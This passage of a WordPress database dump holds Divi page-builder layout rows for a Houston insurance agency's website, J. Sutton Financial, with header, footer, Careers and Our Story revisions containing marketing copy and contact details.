button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section]','UPDATED HEADER','','publish','closed','closed','','updated-header','','','2023-04-02 17:49:05','2023-04-02 17:49:05','',0,'http://cmdev-site1.com/et_pb_layout/updated-header/',0,'et_pb_layout','',0),(578,1,'2023-04-02 17:49:21','2023-04-02 17:49:21','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\" template_type=\"section\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','UPDATED FOOTER','','publish','closed','closed','','updated-footer','','','2023-04-02 17:49:21','2023-04-02 17:49:21','',0,'http://cmdev-site1.com/et_pb_layout/updated-footer/',0,'et_pb_layout','',0),(583,1,'2023-04-02 17:56:17','2023-04-02 17:56:17','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"24.8px\" custom_margin=\"||66px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Default Website Template','','inherit','closed','closed','','523-revision-v1','','','2023-04-02 17:56:17','2023-04-02 17:56:17','',523,'http://cmdev-site1.com/?p=583',0,'revision','',0),(627,1,'2023-04-02 19:17:41','2023-04-02 19:17:41','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.16\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\"][dsm_text_divider header=\"Careers\" color=\"#003372\" divider_style=\"dotted\" divider_weight=\"3px\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" header_text_color=\"#000000\" header_font_size=\"30px\" global_colors_info=\"{}\"][/dsm_text_divider][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|auto||118px||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Thought-Bubbles.png\" alt=\"thought bubbles\" title_text=\"Thought Bubbles\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||70px||\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>WE ARE HIRING!</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Opportunities with American Income Life is truly unlimited. J. Sutton Financial is currently operating throughout Texas and we are rapidly expanding. We are looking for hard-working, dedicated individuals to join our organization.</p>\n<p>We offer a fun, competitive, family-like atmosphere, with plenty of room for growth.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_text_divider header=\"Products & Services\" color=\"#FFFFFF\" divider_weight=\"5px\" text_gap=\"15px\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" background_layout=\"dark\" global_colors_info=\"{}\"][/dsm_text_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_margin=\"-1px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" alt=\"umbrella\" title_text=\"Umbrella Roll in Icon\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"|||193px||\" custom_padding=\"|0px||||\" global_colors_info=\"{}\"][/et_pb_image][dsm_text_badges main_text=\"Life Insurance\" badges_text=\"Policies\" badges_background_color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_orientation=\"center\" custom_margin=\"|||178px||\" link_option_url=\"https://www.ailife.com/products\" global_colors_info=\"{}\"][/dsm_text_badges][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Contract-Icon-Grey-Background.png\" alt=\"secure contract icon\" title_text=\"Contract Icon Grey Background\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"|170px||||\" global_colors_info=\"{}\"][/et_pb_image][dsm_text_badges main_text=\"Policyholder Services\" badges_background_color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|||97px||\" link_option_url=\"https://www.ailife.com/manage-my-policy\" global_colors_info=\"{}\"][/dsm_text_badges][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_cta button_url=\"https://www.ariasagencies.com/products-services/\" button_text=\"Request an agent today!\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_button=\"on\" button_text_color=\"#FFFFFF\" button_bg_color=\"#666666\" button_border_width=\"0px\" button_border_radius=\"14px\" background_layout=\"light\" global_colors_info=\"{}\"][/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Careers','','inherit','closed','closed','','38-revision-v1','','','2023-04-02 19:17:41','2023-04-02 19:17:41','',38,'http://cmdev-site1.com/?p=627',0,'revision','',0),(600,1,'2023-04-02 18:49:39','2023-04-02 18:49:39','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"200.8px\" custom_margin=\"-14px|||||\" custom_padding=\"66px||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"||66px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][dsm_text_divider header=\"Careers\" divider_style=\"dotted\" divider_weight=\"3px\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" header_text_color=\"#000000\" header_font_size=\"30px\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"post_content\" sticky_enabled=\"0\"][/dsm_text_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.16\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|auto||118px||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Thought-Bubbles.png\" alt=\"thought bubbles\" title_text=\"Thought Bubbles\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||70px||\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>WE ARE HIRING!</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Opportunities with American Income Life is truly unlimited. J. Sutton Financial is currently operating throughout Texas and we are rapidly expanding. We are looking for hard-working, dedicated individuals to join our organization.</p>\n<p>We offer a fun, competitive, family-like atmosphere, with plenty of room for growth.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_text_divider header=\"Products & Services\" color=\"#FFFFFF\" divider_weight=\"5px\" text_gap=\"15px\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" background_layout=\"dark\" global_colors_info=\"{}\"][/dsm_text_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_margin=\"-1px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" alt=\"umbrella\" title_text=\"Umbrella Roll in Icon\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"|||193px||\" custom_padding=\"|0px||||\" global_colors_info=\"{}\"][/et_pb_image][dsm_text_badges main_text=\"Life Insurance\" badges_text=\"Policies\" badges_background_color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_orientation=\"center\" custom_margin=\"|||178px||\" link_option_url=\"https://www.ailife.com/products\" global_colors_info=\"{}\"][/dsm_text_badges][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Contract-Icon-Grey-Background.png\" alt=\"secure contract icon\" title_text=\"Contract Icon Grey Background\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"|170px||||\" global_colors_info=\"{}\"][/et_pb_image][dsm_text_badges main_text=\"Policyholder Services\" badges_background_color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|||97px||\" link_option_url=\"https://www.ailife.com/manage-my-policy\" global_colors_info=\"{}\"][/dsm_text_badges][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_cta button_url=\"https://www.ariasagencies.com/products-services/\" button_text=\"Request an agent today!\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_button=\"on\" button_text_color=\"#FFFFFF\" button_bg_color=\"#666666\" button_border_width=\"0px\" button_border_radius=\"14px\" background_layout=\"light\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Careers','','inherit','closed','closed','','38-revision-v1','','','2023-04-02 18:49:39','2023-04-02 18:49:39','',38,'http://cmdev-site1.com/?p=600',0,'revision','',0),(585,1,'2023-04-02 17:59:27','2023-04-02 17:59:27','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(224,219,219,0.39)\" custom_margin=\"77px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\" template_type=\"section\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"99.9%\" custom_margin=\"|-14px||||\" custom_padding=\"8px||0px|||\" global_colors_info=\"{}\"]<h2><strong>Looking for a New Career? Learn How Arias Can Help Grow Your Future.</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_style=\"fade\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section]','Colored-Background','','publish','closed','closed','','colored-background','','','2023-04-02 17:59:27','2023-04-02 17:59:27','',0,'http://cmdev-site1.com/et_pb_layout/colored-background/',0,'et_pb_layout','',0),(596,1,'2023-04-02 18:41:47','2023-04-02 18:41:47','[et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px|||||\" min_height=\"200.8px\" custom_margin=\"-14px|||||\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" custom_padding=\"||66px|||\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\" theme_builder_area=\"post_content\"][dsm_text_divider _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" header=\"Our Story\" header_text_color=\"#000000\" header_font_size=\"30px\" hover_enabled=\"0\" sticky_enabled=\"0\" header_level=\"h2\" header_text_align=\"center\" divider_style=\"dotted\" divider_weight=\"3px\"][/dsm_text_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\" title_text=\"Justin Confrence Room 2 Black & White Muted\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Confrence-Room-2-Black-White-Muted-scaled.jpg\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_margin=\"-11px|||||\" custom_padding=\"33px|||||\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" custom_padding=\"0px||0px|||\" custom_margin=\"66px|auto|66px|auto||\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\" text_text_color=\"#FFFFFF\" custom_margin=\"||||false|false\" custom_padding=\"0px||||false|false\"]<p class=\"font_7\"><span>J. Sutton Financial was founded in 2022 with a vision to extend career opportunities beyond its home city.</span></p>\n<p class=\"font_7\"><span>We service clients and work as a team </span><span style=\"font-size: 14px;\">at our home office in Houston as well as 100% remote. This allows us to not only have an incredible office culture but also service more clients with an agent reach from coast-to-coast.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" column_structure=\"1_3,2_3\" custom_padding=\"66px||66px|||\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_3\" theme_builder_area=\"post_content\"][dsm_perspective_image _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" alt=\"handshake icon\" title_text=\"Shaking Hands Icon No Background Hex 666666\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Shaking-Hands-Icon-No-Background-Hex-666666-scaled.jpg\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_margin=\"-31px|||||\"][/dsm_perspective_image][/et_pb_column][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"2_3\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_margin=\"48px|||||\"]<p>At J. Sutton Financial, our insurance products and services are backed by a promise.</p>\n<p>A Promise of: Financial security and protection for our clients. Commitment and fairness to our agents. Respect and opportunity for our employees. We are committed to bringing a quality product to market while providing the best service at the lowest possible cost.</p>\n<p>&nbsp;</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\" title_text=\"Happy family mother father and daughter walk on nature on sunset\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/About-American-Life-Insurance-Muted-scaled.jpg\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" column_structure=\"1_3,2_3\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_padding=\"66px||66px|||\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_3\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\" text_text_color=\"#FFFFFF\" header_2_text_align=\"center\" header_2_text_color=\"#FFFFFF\" min_height=\"8px\" custom_margin=\"32px|||||\"]<h2>About American Income Life Insurance Company</h2>[/et_pb_text][/et_pb_column][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"2_3\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\" text_text_color=\"#FFFFFF\"]<p>American Income Life is an international company protecting working families in the United States, Canada, New Zealand, and through their wholly-owned subsidary, National Income Life Insurance Company in New York. American Income Life has served working class families since 1951 with life, accident, and supplemental health products to help protect members of labor unions, credit unions, associations, and their families. AIL representatives develop long-term relationships with clients and meet them where they are most comfortable...their home. </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Our Story','','inherit','closed','closed','','26-revision-v1','','','2023-04-02 18:41:47','2023-04-02 18:41:47','',26,'http://cmdev-site1.com/?p=596',0,'revision','',0),(595,1,'2023-04-02 18:41:34','2023-04-02 18:41:34','[et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px|||||\" min_height=\"200.8px\" custom_margin=\"-14px|||||\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" custom_padding=\"||66px|||\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\" theme_builder_area=\"post_content\"][dsm_text_divider _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" header=\"Our Story\" header_text_color=\"#000000\" header_font_size=\"30px\" hover_enabled=\"0\" sticky_enabled=\"0\" header_level=\"h2\" header_text_align=\"center\" divider_style=\"dotted\" divider_weight=\"3px\"][/dsm_text_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\" title_text=\"Justin Confrence Room 2 Black & White Muted\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Confrence-Room-2-Black-White-Muted-scaled.jpg\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_margin=\"-11px|||||\" custom_padding=\"33px|||||\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" custom_padding=\"0px||0px|||\" custom_margin=\"66px|auto|66px|auto||\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\" text_text_color=\"#FFFFFF\" custom_margin=\"||||false|false\" custom_padding=\"0px||||false|false\"]<p class=\"font_7\"><span>J. Sutton Financial was founded in 2022 with a vision to extend career opportunities beyond its home city.</span></p>\n<p class=\"font_7\"><span>We service clients and work as a team </span><span style=\"font-size: 14px;\">at our home office in Houston as well as 100% remote. This allows us to not only have an incredible office culture but also service more clients with an agent reach from coast-to-coast.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" column_structure=\"1_3,2_3\" custom_padding=\"66px||66px|||\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_3\" theme_builder_area=\"post_content\"][dsm_perspective_image _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" alt=\"handshake icon\" title_text=\"Shaking Hands Icon No Background Hex 666666\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Shaking-Hands-Icon-No-Background-Hex-666666-scaled.jpg\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_margin=\"-31px|||||\"][/dsm_perspective_image][/et_pb_column][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"2_3\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_margin=\"48px|||||\"]<p>At J. Sutton Financial, our insurance products and services are backed by a promise.</p>\n<p>A Promise of: Financial security and protection for our clients. Commitment and fairness to our agents. Respect and opportunity for our employees. We are committed to bringing a quality product to market while providing the best service at the lowest possible cost.</p>\n<p>&nbsp;</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\" title_text=\"Happy family mother father and daughter walk on nature on sunset\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/About-American-Life-Insurance-Muted-scaled.jpg\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" column_structure=\"1_3,2_3\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_padding=\"66px||66px|||\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_3\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\" text_text_color=\"#FFFFFF\" header_2_text_align=\"center\" header_2_text_color=\"#FFFFFF\"]<h2>About American Income Life Insurance Company</h2>[/et_pb_text][/et_pb_column][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"2_3\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" hover_enabled=\"0\" sticky_enabled=\"0\" text_text_color=\"#FFFFFF\"]<p>American Income Life is an international company protecting working families in the United States, Canada, New Zealand, and through their wholly-owned subsidary, National Income Life Insurance Company in New York. American Income Life has served working class families since 1951 with life, accident, and supplemental health products to help protect members of labor unions, credit unions, associations, and their families. AIL representatives develop long-term relationships with clients and meet them where they are most comfortable...their home. </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Our Story','','inherit','closed','closed','','26-revision-v1','','','2023-04-02 18:41:34','2023-04-02 18:41:34','',26,'http://cmdev-site1.com/?p=595',0,'revision','',0),(587,1,'2023-04-02 18:07:26','2023-04-02 18:07:26','[dsm_button _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" button_one_text=\"Life Insurance\" button_alignment=\"center\" background_layout=\"dark\" custom_button_one=\"on\" button_one_border_width=\"0px\" 